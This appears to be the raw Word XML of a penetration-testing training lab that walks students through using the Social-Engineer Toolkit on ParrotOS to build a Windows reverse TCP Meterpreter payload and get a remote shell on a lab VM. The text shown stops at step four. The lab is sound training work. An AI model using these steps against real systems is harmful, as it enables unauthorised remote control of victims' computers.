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FBEDB" w14:textId="75D756C4" w:rsidR="00013734" w:rsidRPr="001A500E" w:rsidRDefault="00013734" w:rsidP="00013734">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab</w:t>
      </w:r>
      <w:r w:rsidR="007F3587" w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00E41C98" w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Establish a Meterpreter Shell on a Windows Target using SET in ParrotOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9D31D" w14:textId="77777777" w:rsidR="00013734" w:rsidRPr="001A500E" w:rsidRDefault="00013734" w:rsidP="00013734">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0F0FFE" w14:textId="77777777" w:rsidR="00E41C98" w:rsidRPr="001A500E" w:rsidRDefault="00E41C98" w:rsidP="00E41C98">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>PAMTech Corporation, a global enterprise with critical financial and customer data, is strengthening its defense mechanisms against targeted cyberattacks. While traditional defenses such as antivirus and firewalls are in place, the company recognizes the rising threat of social engineering attacks and remote access payloads. These attacks often trick unsuspecting users into executing malicious files, leading to complete system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3484ED88" w14:textId="1DFFFA32" w:rsidR="00013734" w:rsidRPr="001A500E" w:rsidRDefault="00E41C98" w:rsidP="00E41C98">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To simulate a real-world </w:t>
      </w:r>
      <w:r w:rsidR="009101D8" w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Advanced Persistent Threat </w:t>
      </w:r>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(APT) scenario, PAMTech's cybersecurity team has decided to assess the effectiveness of their endpoint defenses and employee awareness. As part of this exercise, a red team engagement will demonstrate how a seemingly harmless executable can establish a remote session and provide full control to an attacker using a Meterpreter shell</w:t>
      </w:r>
      <w:r w:rsidR="00013734" w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9946C2" w14:textId="77777777" w:rsidR="00013734" w:rsidRPr="001A500E" w:rsidRDefault="00013734" w:rsidP="00013734">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A5C9F0" w14:textId="02F7BD9B" w:rsidR="00E41C98" w:rsidRPr="001A500E" w:rsidRDefault="00E41C98" w:rsidP="00E41C98">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You have been brought in as a </w:t>
      </w:r>
      <w:r w:rsidR="009101D8" w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>certified security practitioner</w:t>
      </w:r>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to conduct this simulation using the Social-Engineer Toolkit (SET) within ParrotOS. Your objective is to generate a Metasploit payload, deliver it to a Windows 10 target machine, and successfully establish a Meterpreter shell connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7546F125" w14:textId="1E06B9E2" w:rsidR="006807DE" w:rsidRPr="001A500E" w:rsidRDefault="006807DE" w:rsidP="001A500E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>This demonstration will walk through the process of creating a Windows reverse TCP payload using the Social-Engineer Toolkit (SET), launching a listener through Metasploit for command-and-control, transferring the payload to a Windows virtual machine via an HTTP server, and executing the payload on the target system to gain interactive control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E406CB0" w14:textId="76810126" w:rsidR="00E41C98" w:rsidRPr="001A500E" w:rsidRDefault="00E41C98" w:rsidP="00E41C98">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>By completing this lab, you will gain hands-on experience with how attackers craft and deploy payloads, and how endpoint vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00B34C44" w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F55CB2" w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>especially user behavior and lack of awareness</w:t>
      </w:r>
      <w:r w:rsidR="00B34C44" w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F55CB2" w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>can be exploited for full system access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD1517" w14:textId="63E33765" w:rsidR="007760A3" w:rsidRPr="001A500E" w:rsidRDefault="00E41C98" w:rsidP="00E41C98">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET is a powerful, open-source tool designed for simulating social engineering attacks. It integrates tightly with Metasploit to deliver payloads such as reverse shells and allows attackers and penetration testers to craft convincing phishing campaigns and Trojanized executables. Its “Create a Payload and Listener” module streamlines the process of payload delivery and session management, making it a valuable tool in any red team’s arsenal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17635699" w14:textId="4EB55FB3" w:rsidR="00013734" w:rsidRPr="001A500E" w:rsidRDefault="00013734" w:rsidP="00013734">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In this lab, we use two virtual machines: ParrotOS and Windows 10. The ParrotOS, as an attacker machine, has an IP address of </w:t>
      </w:r>
      <w:r w:rsidR="00E41C98" w:rsidRPr="001A500E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>192</w:t>
      </w:r>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E41C98" w:rsidRPr="001A500E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>168.100.68.</w:t>
      </w:r>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The Windows 10, as a victim machine, has an IP address of </w:t>
      </w:r>
      <w:r w:rsidR="00E41C98" w:rsidRPr="001A500E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>192.168.100.67</w:t>
      </w:r>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. When you perform this lab, use your virtual machine IP addresses, not this lab</w:t>
      </w:r>
      <w:r w:rsidR="00B34C44" w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'s</w:t>
      </w:r>
      <w:r w:rsidRPr="001A500E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9017"/>
      </w:tblGrid>
      <w:tr w:rsidR="00013734" w:rsidRPr="001A500E" w14:paraId="64F932A3" w14:textId="77777777" w:rsidTr="00EC4992">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="58FDF16A" w14:textId="53CB9606" w:rsidR="00013734" w:rsidRPr="001A500E" w:rsidRDefault="00013734" w:rsidP="00EC4992">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Turn on </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ParrotOS </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">and </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 10 </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">virtual machines. Switch to the </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ParrotOS</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> virtual machine, open a Terminal, and execute the </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sudo su</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> command to run programs </w:t>
            </w:r>
            <w:r w:rsidR="00B34C44" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">with </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root privilege</w:t>
            </w:r>
            <w:r w:rsidR="00B34C44" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. Execute the following command: </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>setoolki</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">t to launch </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Social-Engineer Toolkit.</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> If a </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Do you agree to the terms of service [y/n]</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> question appears, enter </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">y </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">and press </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enter</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21235FF1" w14:textId="77777777" w:rsidR="00013734" w:rsidRPr="001A500E" w:rsidRDefault="00013734" w:rsidP="00EC4992">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1516D9D0" wp14:editId="6CBA7F23">
                  <wp:extent cx="4200525" cy="3005561"/>
                  <wp:effectExtent l="19050" t="19050" r="952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257612" cy="3046408"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6524560C" w14:textId="77777777" w:rsidR="00013734" w:rsidRPr="001A500E" w:rsidRDefault="00013734" w:rsidP="00EC4992">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. The SET menu appears. Type </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and press </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enter</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> to select </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Social-Engineering Attacks</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E05FEB9" w14:textId="77777777" w:rsidR="00013734" w:rsidRPr="001A500E" w:rsidRDefault="00013734" w:rsidP="00EC4992">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="544E71FF" wp14:editId="570D0A87">
                  <wp:extent cx="3667125" cy="3259262"/>
                  <wp:effectExtent l="19050" t="19050" r="952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683109" cy="3273468"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0450E32B" w14:textId="7C2E96F8" w:rsidR="00013734" w:rsidRPr="001A500E" w:rsidRDefault="00013734" w:rsidP="00DA6395">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. </w:t>
            </w:r>
            <w:r w:rsidR="00DA6395" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">We will then be presented with another menu. Once here, we will be choosing option </w:t>
            </w:r>
            <w:r w:rsidR="00DA6395" w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4. Create a Payload and Listener.</w:t>
            </w:r>
            <w:r w:rsidR="00DA6395" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Select this option by typing </w:t>
            </w:r>
            <w:r w:rsidR="00DA6395" w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
            <w:r w:rsidR="00DA6395" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">and </w:t>
            </w:r>
            <w:r w:rsidR="00AE2C5A" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>press</w:t>
            </w:r>
            <w:r w:rsidR="007023D6" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ing</w:t>
            </w:r>
            <w:r w:rsidR="00AE2C5A" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AE2C5A" w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enter</w:t>
            </w:r>
            <w:r w:rsidR="00DA6395" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43F2952E" w14:textId="601B10B2" w:rsidR="00DA6395" w:rsidRPr="001A500E" w:rsidRDefault="0037552B" w:rsidP="0037552B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="095C6172" wp14:editId="5956C6C2">
                  <wp:extent cx="4191000" cy="3667298"/>
                  <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                  <wp:docPr id="20086027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02736" name="Picture 1"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06405" cy="3680778"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:schemeClr val="tx1"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E2796B4" w14:textId="2262975D" w:rsidR="00013734" w:rsidRPr="001A500E" w:rsidRDefault="00DA6395" w:rsidP="00DA6395">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>4. We will be presented with another menu here</w:t>
            </w:r>
            <w:r w:rsidR="00B34C44" w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> which will ask us what kind of payload we wish to create. For this lab, we will be choosing option </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Windows Reverse_TCP Meterpreter.</w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Type </w:t>
            </w:r>
            <w:r w:rsidRPr="001A500E">
              <w:rPr>
                <w:b/>
